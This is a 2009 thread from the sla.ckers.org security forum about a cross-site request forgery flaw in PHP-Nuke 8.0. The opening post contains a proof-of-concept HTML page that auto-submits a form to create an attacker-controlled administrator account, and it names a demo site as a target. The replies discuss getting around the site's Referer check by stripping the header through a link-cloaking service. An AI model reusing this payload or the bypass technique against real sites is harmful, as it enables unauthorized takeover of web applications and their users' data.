Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: XaDoS
Date: September 16, 2009 09:44AM

Hey guys!
Some weeks ago i try to code a html page for the php nuke v 8.0 becouse i see that is vulnerable to csrf attack.
I see that a malicious person can add a admin user into a board with administrator privileges.
I have only a problem that i write in my last topik here: HTTP_referrer..
the site, when i try to add admin user respond me:
yuor broswer don't send the HTTP_referrer header.
send it and later you can execute all POST request.

I try with a tool for create/edit http referrer but it's not usefull becouse the "victim" admin of a site when clik on my fake html page with csrf don't have a tool for change or edit the referrer..so i stop this argoument. if anybody can help me or have some idea contact me or post here immediatly!
thanks in advance.

CSRF code:
<html>
<head>
<title>PHP-Nuke 8.0 (final version) <= CSRF vuln (add admin user)</title>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body>
<form name="xados" action="[VICTIM_SITE]" method="post">
<input type="text" name="add_name" size="30" maxlength="50" value="[NICKNAME]" />
<input type="text" name="add_aid" size="30" maxlength="25" value="[NAME]" />
<input type="text" name="add_email" size="30" maxlength="60" value="&quot; /&gt;
&lt;input type=&quot;checkbox&quot; name=&quot;add_radminsuper&quot; value=&quot;1&quot;/&gt;
&lt;input type=&quot;password&quot; name=&quot;add_pwd&quot; size=&quot;12&quot; maxlength=&quot;40&quot; value=&quot;[PASSWORD]&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;op&quot; value=&quot;AddAuthor&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;Add Author&quot; /&gt;
&lt;/form&gt;
&lt;script&gt;document.xados.submit()&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

for try write in VICTIM_SITE:
http://demo.opensourcecms.com/phpnuke/admin.php?op=mod_authors

naturally you must be log in as admin user and then click on my csrf page.

Options: ReplyQuote
Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: rvdh
Date: September 17, 2009 02:02AM

Ugh PHP-Nuke, that piece of crappy software never was secure, I'm amazed that it's still alive. It should be NUKED! ;-)

Options: ReplyQuote
Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: clayfox
Date: September 17, 2009 08:49AM

It might be easier to send No referer instead of a spoofed referer. Often referer checks are bypassed by sending no referers.

-clayfox

Options: ReplyQuote
Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: XaDoS
Date: September 17, 2009 12:43PM

ok but how can i send the referrer trought html(with csrf code) page?

Options: ReplyQuote
Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: Zer0x00
Date: September 18, 2009 12:21PM

Yes, I'm interested too :/

Options: ReplyQuote
Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: PaPPy
Date: September 19, 2009 05:32AM

http://referer.us/hide-http-referer.html
http://en.wikipedia.org/wiki/Referrer_spoofing
are internesting

i remember coming across a javacsript from one of these sites you could place into your code and any links off it (including post) would be rewritten to have no Referrer info

found it http://cloakedlink.com/
click more options

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 09/19/2009 05:34AM by PaPPy.

Options: ReplyQuote
Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: XaDoS
Date: September 20, 2009 01:42PM

thanks so much pappy,
i try with http://cloakedlink.com/ and work fine: the site don't show me the message with the referrer problem..but don't work the csrf :(
i don't understand what is the problem.. but i'm trying in the next days.

Options: ReplyQuote
Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: PaPPy
Date: September 20, 2009 11:40PM

look thru the code of php-nuke and see if they generate any session vars that are needed on the next page or something

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote


Sorry, only registered users may post in this forum.